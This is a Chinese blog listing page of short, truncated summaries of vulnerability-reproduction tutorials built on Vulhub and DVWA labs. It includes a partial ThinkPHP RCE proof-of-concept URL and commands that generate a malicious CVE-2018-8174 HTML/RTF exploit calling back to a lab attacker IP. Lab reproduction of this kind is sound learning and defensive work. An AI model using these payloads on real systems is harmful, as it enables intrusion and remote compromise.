
已有的事后必再有
告诉桃花不用开了
免责声明:本人所写博客均用于学习,不可用于违法行为,若有违反,所造成的所有损失本人概不负责
展开
-
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞_Gjqhs的博客-优快云博客没太大区别,不过是由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。访问http://your-ip:8080,您将看到 ThinkPHP 的默认页面。POC直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_f.原创 2022-03-09 02:28:10 · 3019 阅读 · 0 评论 -
ThinkPHP5 5.0.23 远程代码执行漏洞
ThinkPHP是国内使用极为广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时,对其进行了错误的处理,使得攻击者可以调用 Request 类的任意方法,从而通过特定的利用链导致 RCE 漏洞。环境设置Vulhub 靶场下载使用_Gjqhs的博客-优快云博客进入对应目录cd /home/vulhub/thinkphp/5.0.23-rce/也可以一步步来输入以下命令:(ThinkPHP版本:5.0.23)docker-compo原创 2022-03-09 02:08:32 · 721 阅读 · 0 评论 -
Vulhub 靶场下载使用
Vulhub 靶场安装_Gjqhs的博客-优快云博客官网查找是否有此漏洞镜像点击搜索结果即可查看对应信息以及复现利用方法 拉取方法修改网址前面加git,后面操作跟上面官网步骤走即可...原创 2022-03-09 01:16:37 · 478 阅读 · 0 评论 -
CVE-2020-17530——Struts2 S2-061 远程代码执行漏洞复现讲解
Vulhub 靶场安装_Gjqhs的博客-优快云博客docker下载慢,卡顿解决办法——免费安装人人都有的docker加速器_Gjqhs的博客-优快云博客克隆拉取git clone https://github.com/vulhub/vulhub 进入目录cd vulhub/struts2/s2-061启动成功查看IPifconfig主机访问其IP:8080burpsuite抓包如上修改图像化复现后可以搞事情去了...原创 2022-03-09 00:36:22 · 2253 阅读 · 0 评论 -
74cms3.0安装以及cmsSQL注入漏洞详解
下载解压到www目录并开启低版本PHP服务http://127.0.0.1/74cms3.0/install/index.phpError:Can‘t select MySQL database(74cms3.0)!问题解决无脑确定按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com后台前台注册...原创 2022-03-08 14:47:18 · 1705 阅读 · 0 评论 -
nigix文件解析漏洞
转载 2022-03-08 02:03:22 · 128 阅读 · 0 评论 -
(vulhub)PHP环境XML外部实体注入漏洞(XXE)
Vulhub 靶场安装_Gjqhs的博客-优快云博客查询对应镜像打开dockersystemctl start docker设置docker自启动systemctl enable docker查看docker状态systemctl status docker 查找xxe镜像docker search php_xxe拉取镜像,(有可能超时,如下)启动xxe服务访问即可见此页面,可看到其版本为2.8.0。http:...原创 2022-03-08 01:00:06 · 1108 阅读 · 0 评论 -
msf aux模块使用
普及auxiliary模块的基本使用方法简介auxiliary(辅助模块)主要功能:执行扫描、嘎探、指纹识别等相关功能以辅助渗透测试。与exploits模块的区别exploits模块一般需要和payloads模块联合使用,通过exploits模块渗透成功后执行payloads模块中的代码。auxiliary模块不需要和payloads模块联合使用文件位置:/usr/share/metasploit-framework/modules/auxiliaryauxiliary模块应用实例1原创 2022-03-07 18:29:32 · 1800 阅读 · 0 评论 -
DVWA暴力破解(Brute Force)——全等级(Low,Medium,High,lmpossible)精讲
使用phpstudy搭建渗透测试靶场环境目录1.Low级别2.mediun级别3.high级别4.impossible级别1.Low级别文件源代码:<?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]...原创 2022-03-07 17:42:29 · 7152 阅读 · 1 评论 -
CVE-2018-8174漏洞提权
配置kali下载CVE-2018-8174_EXP.git生成恶意html和rtf文件cd CVE-2018-8174_EXP/git clone https://github.com/iBearcat/CVE-2018-8174_EXP.gitpython CVE-2018-8174.py -u http://192.168.114.130/exploit.html -o exploit.rtf -i 192.168.114.13...原创 2022-03-05 16:31:05 · 981 阅读 · 0 评论 -
QQProtect.exe(Q盾)
火绒的下载使用(附应急解决Q盾:QQProtect.exe的方法)原创 2022-01-22 22:26:04 · 3629 阅读 · 0 评论 -
Log4j2解决方案与复现略图
更新版本原创 2021-12-23 12:03:41 · 229 阅读 · 0 评论 -
永恒之蓝漏洞利用攻击以及修复方法
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结前言提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.原创 2021-12-12 17:49:59 · 7150 阅读 · 2 评论 -
phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现
漏洞描述 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。漏洞影原创 2022-03-01 00:52:54 · 253 阅读 · 0 评论 -
远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。影响版本:向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315(2021.12)实验环境 :win10虚拟机工具下载(含有漏洞版本的向日葵):https://github.com/Mr-xn/sunlog...原创 2022-03-01 00:03:56 · 3490 阅读 · 0 评论